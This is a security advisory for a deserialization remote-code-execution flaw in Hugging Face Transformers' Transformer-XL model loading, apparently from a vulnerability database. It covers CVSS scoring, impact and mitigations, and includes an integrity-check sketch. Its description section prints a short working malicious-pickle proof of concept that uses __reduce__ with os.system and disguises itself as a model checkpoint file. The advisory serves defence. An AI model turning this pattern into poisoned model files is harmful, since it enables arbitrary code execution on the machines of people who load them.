CVE-2025-14921: CWE-502: Deserialization of Untrusted Data in Hugging Face Transformers

Severity: High
Tags: Vulnerability, CVE-2025-14921, CWE-502
Published: Tue Dec 23 2025 (12/23/2025, 21:04:23 UTC)
Source: CVE Database V5
Vendor/Project: Hugging Face
Product: Transformers

Description

Hugging Face Transformers Transformer-XL Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25424.
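The advisory does not publish the vulnerable code path, but the CWE-502 pattern it describes is well understood for Python pickle-based model formats: the serialized stream itself can nominate a callable to run during deserialization, so merely loading an untrusted file executes attacker-chosen code. Below is a minimal, self-contained sketch of that general pattern; it is not taken from the Transformers codebase, and the file name and payload are hypothetical.

import os
import pickle

class MaliciousPayload:
    # pickle calls __reduce__ to decide how to reconstruct the object;
    # returning (os.system, ("id",)) makes the deserializer itself run the command.
    def __reduce__(self):
        return (os.system, ("id",))

# Attacker side: produce a file that looks like an ordinary model artifact.
with open("model_checkpoint.bin", "wb") as fh:
    pickle.dump(MaliciousPayload(), fh)

# Victim side: simply loading the file runs the embedded command; the victim
# never needs to call anything on the returned object.
with open("model_checkpoint.bin", "rb") as fh:
    pickle.load(fh)

This is why the mitigations below emphasize provenance checks and non-executable weight formats rather than attempting to sanitize a serialized stream after the fact.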

AI-Powered Analysis

Last updated: 12/23/2025, 21:20:18 UTC

Technical Analysis

CVE-2025-14921 is a deserialization vulnerability classified under CWE-502 affecting the Hugging Face Transformers library, specifically its Transformer-XL model support. The vulnerability stems from inadequate validation of user-supplied data during the parsing of model files: an attacker can craft malicious serialized data that, when deserialized by the library, executes arbitrary attacker-supplied code. The flaw requires user interaction, such as opening a malicious file or visiting a malicious webpage that triggers the deserialization process. The vulnerability has a CVSS 3.0 base score of 7.8 (high severity) with the vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H: local attack vector, low attack complexity, no privileges required, user interaction required, unchanged scope, and high impact on confidentiality, integrity, and availability. In practice this means the attacker must convince a user to load a malicious model file, but needs no prior access or elevated privileges, and successful exploitation yields code execution and potential full compromise in the context of the current user. The vulnerability is particularly critical in environments where the Transformers library is used to load or process untrusted model files or data. No patches or in-the-wild exploits are currently reported, but the risk remains significant given the widespread use of Hugging Face Transformers in AI and ML applications. The vulnerability was assigned by ZDI (ZDI-CAN-25424) and published on December 23, 2025.
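For reference, the 7.8 figure can be reproduced directly from the CVSS v3.0 base-score equations. The short sketch below plugs the standard specification constants for the vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H into those formulas; the constants come from the public CVSS v3.0 specification, not from this advisory.

import math

# Exploitability metric weights: Local, Low complexity, No privileges, UI Required.
av, ac, pr, ui = 0.55, 0.77, 0.85, 0.62
# Impact metric weights: High confidentiality, integrity, and availability impact.
c = i = a = 0.56

iss = 1 - (1 - c) * (1 - i) * (1 - a)      # impact sub-score
impact = 6.42 * iss                        # scope: unchanged
exploitability = 8.22 * av * ac * pr * ui

# CVSS v3.0 rounds the base score up to one decimal place.
base_score = math.ceil(min(impact + exploitability, 10) * 10) / 10
print(base_score)                          # 7.8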

Potential Impact

For European organizations, the impact of CVE-2025-14921 can be severe, especially for those leveraging AI and machine learning frameworks that incorporate Hugging Face Transformers. Successful exploitation could lead to remote code execution, allowing attackers to compromise sensitive data, manipulate AI model outputs, or disrupt AI-driven services. This could affect sectors such as finance, healthcare, automotive, and research institutions that rely heavily on AI models for decision-making and automation. Confidentiality breaches could expose proprietary models or personal data, while integrity violations could lead to corrupted AI outputs, undermining trust in automated systems. Availability impacts could result in denial of service or ransomware deployment. Given the user interaction requirement, phishing or social engineering campaigns could be used to trigger exploitation, increasing the risk in environments with less stringent user awareness training. The lack of known exploits in the wild provides a window for proactive defense, but the high severity score underscores the urgency of mitigation.

Mitigation Recommendations

To mitigate CVE-2025-14921, European organizations should implement the following specific measures:

1. Restrict the sources of model files to trusted repositories and verify integrity using cryptographic hashes or signatures before loading them into Hugging Face Transformers (see the verification sketch after this list).
2. Employ sandboxing or containerization to isolate the execution environment of AI models, limiting the impact of potential code execution.
3. Enhance user awareness training to reduce the risk of social engineering attacks that could lead to user interaction with malicious files or links.
4. Monitor and log deserialization activities and model loading processes to detect anomalous behavior indicative of exploitation attempts.
5. Apply strict access controls and least-privilege principles to the environments running Hugging Face Transformers to minimize damage if exploitation occurs.
6. Stay updated with vendor advisories and apply patches or updates as soon as they become available.
7. Consider implementing application whitelisting to prevent unauthorized code execution.
8. Use network segmentation to isolate AI/ML infrastructure from critical business systems.

These targeted actions go beyond generic advice and address the specific attack vector and exploitation conditions of this vulnerability.
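As a concrete starting point for items 1 and 6, the sketch below refuses to load a model artifact whose SHA-256 digest does not match a pinned, known-good value, and prefers the non-executable safetensors weight format where a trusted publisher provides it. The path, digest, and model name are placeholders, not values taken from this advisory.

import hashlib
from pathlib import Path

# Placeholder: a known-good digest obtained out of band from a trusted channel.
EXPECTED_SHA256 = "<known-good sha256 hex digest>"

def verify_artifact(path: Path, expected: str) -> None:
    """Hash the file in chunks and refuse to proceed on any mismatch."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    if digest.hexdigest() != expected:
        raise RuntimeError(f"Refusing to load {path}: digest mismatch")

artifact = Path("models/transfo-xl/pytorch_model.bin")  # placeholder path
verify_artifact(artifact, EXPECTED_SHA256)

# Where available, prefer safetensors weights, which are a plain tensor
# container and do not execute code on load (recent Transformers releases
# expose this via the use_safetensors flag of from_pretrained):
# from transformers import AutoModel
# model = AutoModel.from_pretrained("trusted-org/model-name", use_safetensors=True)

Hash pinning only helps when the pinned digest itself comes from a trusted channel; combine it with the sandboxing and least-privilege measures above for defense in depth.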


Technical Details

Data Version: 5.2
Assigner Short Name: zdi
Date Reserved: 2025-12-18T20:43:19.963Z
CVSS Version: 3.0
State: PUBLISHED

Threat ID: 694b064e4eddf7475afca170

Added to database: 12/23/2025, 9:14:54 PM

Last enriched: 12/23/2025, 9:20:18 PM

Last updated: 12/26/2025, 6:54:42 PM

